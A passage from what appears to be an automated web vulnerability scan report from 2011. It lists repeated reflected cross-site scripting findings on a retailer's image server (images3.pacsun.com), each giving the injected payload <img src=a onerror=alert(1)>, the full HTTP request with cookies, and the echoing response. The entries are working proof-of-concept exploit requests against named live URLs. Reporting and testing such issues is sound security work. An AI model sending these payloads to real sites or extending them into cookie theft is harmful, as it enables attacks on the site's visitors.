Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/AC_close_052110de589<img src=a onerror=alert(1)>0d8ae2ced7c

3.20. http://images3.pacsun.com/is/image/pacsun/FSO_093011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_093011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a4e3<img%20src%3da%20onerror%3dalert(1)>2ed1c13b337 was submitted in the REST URL parameter 4. This input was echoed as 8a4e3<img src=a onerror=alert(1)>2ed1c13b337 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_0930118a4e3<img%20src%3da%20onerror%3dalert(1)>2ed1c13b337?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 77
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/FSO_0930118a4e3<img src=a onerror=alert(1)>2ed1c13b337

3.21. http://images3.pacsun.com/is/image/pacsun/FSO_popup_093011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_popup_093011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 54169<img%20src%3da%20onerror%3dalert(1)>14dae13a434 was submitted in the REST URL parameter 4. This input was echoed as 54169<img src=a onerror=alert(1)>14dae13a434 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_popup_09301154169<img%20src%3da%20onerror%3dalert(1)>14dae13a434?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:09 GMT
Connection: close

Unable to find /pacsun/FSO_popup_09301154169<img src=a onerror=alert(1)>14dae13a434

3.22. http://images3.pacsun.com/is/image/pacsun/brandLogo_321 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brandLogo_321

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c84<img%20src%3da%20onerror%3dalert(1)>76ce5578b56 was submitted in the REST URL parameter 4. This input was echoed as a8c84<img src=a onerror=alert(1)>76ce5578b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brandLogo_321a8c84<img%20src%3da%20onerror%3dalert(1)>76ce5578b56?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/brandLogo_321a8c84<img src=a onerror=alert(1)>76ce5578b56

3.23. http://images3.pacsun.com/is/image/pacsun/brandScrollButLeft [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brandScrollButLeft

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f184<img%20src%3da%20onerror%3dalert(1)>54ec4aa3fa6 was submitted in the REST URL parameter 4. This input was echoed as 1f184<img src=a onerror=alert(1)>54ec4aa3fa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brandScrollButLeft1f184<img%20src%3da%20onerror%3dalert(1)>54ec4aa3fa6?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/brandScrollButLeft1f184<img src=a onerror=alert(1)>54ec4aa3fa6

3.24. http://images3.pacsun.com/is/image/pacsun/brandScrollButRight [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brandScrollButRight

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22c96<img%20src%3da%20onerror%3dalert(1)>85ffdcff86d was submitted in the REST URL parameter 4. This input was echoed as 22c96<img src=a onerror=alert(1)>85ffdcff86d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brandScrollButRight22c96<img%20src%3da%20onerror%3dalert(1)>85ffdcff86d?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:44 GMT
Connection: close

Unable to find /pacsun/brandScrollButRight22c96<img src=a onerror=alert(1)>85ffdcff86d

3.25. http://images3.pacsun.com/is/image/pacsun/brand_logo002 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo002

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71350<img%20src%3da%20onerror%3dalert(1)>69a1cd2b9d4 was submitted in the REST URL parameter 4. This input was echoed as 71350<img src=a onerror=alert(1)>69a1cd2b9d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo00271350<img%20src%3da%20onerror%3dalert(1)>69a1cd2b9d4?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/brand_logo00271350<img src=a onerror=alert(1)>69a1cd2b9d4

3.26. http://images3.pacsun.com/is/image/pacsun/brand_logo003 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecc70<img%20src%3da%20onerror%3dalert(1)>580250d2dd7 was submitted in the REST URL parameter 4. This input was echoed as ecc70<img src=a onerror=alert(1)>580250d2dd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo003ecc70<img%20src%3da%20onerror%3dalert(1)>580250d2dd7?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/brand_logo003ecc70<img src=a onerror=alert(1)>580250d2dd7

3.27. http://images3.pacsun.com/is/image/pacsun/brand_logo004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4349<img%20src%3da%20onerror%3dalert(1)>1d1ac9815d3 was submitted in the REST URL parameter 4. This input was echoed as e4349<img src=a onerror=alert(1)>1d1ac9815d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo004e4349<img%20src%3da%20onerror%3dalert(1)>1d1ac9815d3?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:01 GMT
Connection: close

Unable to find /pacsun/brand_logo004e4349<img src=a onerror=alert(1)>1d1ac9815d3

3.28. http://images3.pacsun.com/is/image/pacsun/brand_logo005 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo005

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac27d<img%20src%3da%20onerror%3dalert(1)>238586c1107 was submitted in the REST URL parameter 4. This input was echoed as ac27d<img src=a onerror=alert(1)>238586c1107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo005ac27d<img%20src%3da%20onerror%3dalert(1)>238586c1107?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/brand_logo005ac27d<img src=a onerror=alert(1)>238586c1107

3.29. http://images3.pacsun.com/is/image/pacsun/brand_logo006 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo006

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52977<img%20src%3da%20onerror%3dalert(1)>af894da79fc was submitted in the REST URL parameter 4. This input was echoed as 52977<img src=a onerror=alert(1)>af894da79fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo00652977<img%20src%3da%20onerror%3dalert(1)>af894da79fc?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/brand_logo00652977<img src=a onerror=alert(1)>af894da79fc

3.30. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo007

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755a4<img%20src%3da%20onerror%3dalert(1)>e9fdd65a692 was submitted in the REST URL parameter 4. This input was echoed as 755a4<img src=a onerror=alert(1)>e9fdd65a692 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo007755a4<img%20src%3da%20onerror%3dalert(1)>e9fdd65a692?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/brand_logo007755a4<img src=a onerror=alert(1)>e9fdd65a692

3.31. http://images3.pacsun.com/is/image/pacsun/brand_logo008 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo008

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83cda<img%20src%3da%20onerror%3dalert(1)>302fb0df51c was submitted in the REST URL parameter 4. This input was echoed as 83cda<img src=a onerror=alert(1)>302fb0df51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo00883cda<img%20src%3da%20onerror%3dalert(1)>302fb0df51c?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/brand_logo00883cda<img src=a onerror=alert(1)>302fb0df51c

3.32. http://images3.pacsun.com/is/image/pacsun/brand_logo009 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo009

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<img%20src%3da%20onerror%3dalert(1)>acb8607ef78 was submitted in the REST URL parameter 4. This input was echoed as dcef3<img src=a onerror=alert(1)>acb8607ef78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo009dcef3<img%20src%3da%20onerror%3dalert(1)>acb8607ef78?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo009dcef3<img src=a onerror=alert(1)>acb8607ef78

3.33. http://images3.pacsun.com/is/image/pacsun/brand_logo010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fd5d<img%20src%3da%20onerror%3dalert(1)>e5d3540ef89 was submitted in the REST URL parameter 4. This input was echoed as 8fd5d<img src=a onerror=alert(1)>e5d3540ef89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo0108fd5d<img%20src%3da%20onerror%3dalert(1)>e5d3540ef89?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:01 GMT
Connection: close

Unable to find /pacsun/brand_logo0108fd5d<img src=a onerror=alert(1)>e5d3540ef89

3.34. http://images3.pacsun.com/is/image/pacsun/brand_logo011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75176<img%20src%3da%20onerror%3dalert(1)>82dc671c0f8 was submitted in the REST URL parameter 4. This input was echoed as 75176<img src=a onerror=alert(1)>82dc671c0f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo01175176<img%20src%3da%20onerror%3dalert(1)>82dc671c0f8?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo01175176<img src=a onerror=alert(1)>82dc671c0f8

3.35. http://images3.pacsun.com/is/image/pacsun/brand_logo012 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo012

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b456<img%20src%3da%20onerror%3dalert(1)>3ef34cddc25 was submitted in the REST URL parameter 4. This input was echoed as 2b456<img src=a onerror=alert(1)>3ef34cddc25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo0122b456<img%20src%3da%20onerror%3dalert(1)>3ef34cddc25?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo0122b456<img src=a onerror=alert(1)>3ef34cddc25

3.36. http://images3.pacsun.com/is/image/pacsun/brand_logo013 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo013

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26bb8<img%20src%3da%20onerror%3dalert(1)>4f418de10fa was submitted in the REST URL parameter 4. This input was echoed as 26bb8<img src=a onerror=alert(1)>4f418de10fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo01326bb8<img%20src%3da%20onerror%3dalert(1)>4f418de10fa?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/brand_logo01326bb8<img src=a onerror=alert(1)>4f418de10fa

3.37. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5e3e<img%20src%3da%20onerror%3dalert(1)>af792a1d8d2 was submitted in the REST URL parameter 4. This input was echoed as c5e3e<img src=a onerror=alert(1)>af792a1d8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo014c5e3e<img%20src%3da%20onerror%3dalert(1)>af792a1d8d2?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
